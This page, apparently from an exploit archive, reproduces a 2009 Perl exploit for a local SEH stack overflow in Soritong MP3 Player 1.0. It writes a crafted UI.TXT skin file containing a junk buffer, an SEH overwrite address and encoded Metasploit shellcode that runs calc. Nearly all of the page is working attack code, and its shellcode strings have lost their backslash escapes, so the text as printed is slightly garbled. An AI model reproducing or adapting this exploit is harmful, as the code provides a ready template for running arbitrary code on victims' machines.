Home / os / win10

soritongmp3skin-overflow.txt

Posted on 21 July 2009

###################################################### #-------------------- ~~> SkuLL-HacKeR <~~ -----------------# #################################################### #!/usr/bin/perl #[+] Bug : Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow Exploit (SEH) # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44". "x42x30x42x50x42x30x4bx38x45x54x4ex33x4bx58x4ex37". "x45x50x4ax47x41x30x4fx4ex4bx38x4fx44x4ax41x4bx48". "x4fx35x42x32x41x50x4bx4ex49x34x4bx38x46x43x4bx48". "x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x48x42x4c". "x46x37x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e". "x46x4fx4bx43x46x35x46x42x46x30x45x47x45x4ex4bx48". "x4fx35x46x42x41x50x4bx4ex48x46x4bx58x4ex30x4bx54". "x4bx58x4fx55x4ex31x41x50x4bx4ex4bx58x4ex31x4bx48". "x41x30x4bx4ex49x38x4ex45x46x52x46x30x43x4cx41x43". "x42x4cx46x46x4bx48x42x54x42x53x45x38x42x4cx4ax57". "x4ex30x4bx48x42x54x4ex30x4bx48x42x37x4ex51x4dx4a". "x4bx58x4ax56x4ax50x4bx4ex49x30x4bx38x42x38x42x4b". "x42x50x42x30x42x50x4bx58x4ax46x4ex43x4fx35x41x53". "x48x4fx42x56x48x45x49x38x4ax4fx43x48x42x4cx4bx37". "x42x35x4ax46x42x4fx4cx48x46x50x4fx45x4ax46x4ax49". "x50x4fx4cx58x50x30x47x45x4fx4fx47x4ex43x36x41x46". "x4ex36x43x46x42x50x5a"; my $junk = "x41" x 584; my $nseh = "xEBx06x90x90"; my $seh = "xE8x8Dx01x10"; # universall adress my $junk2 = "x90" x 1000; open(myfile,'>>UI.TXT'); print myfile $junk.$nseh.$seh.$shellcode.$junk2; print $payload; ############################################## # Author : SkuLL-HacKeR # Home : WwW.Sec-ArT.CoM/cc # GreetZ : ~~> etc ............. ** *** *** *** ****** ***** **** *** ** * l l V # By SkuLL-HACkeR ^ l l ##############################################

 

TOP

Malware :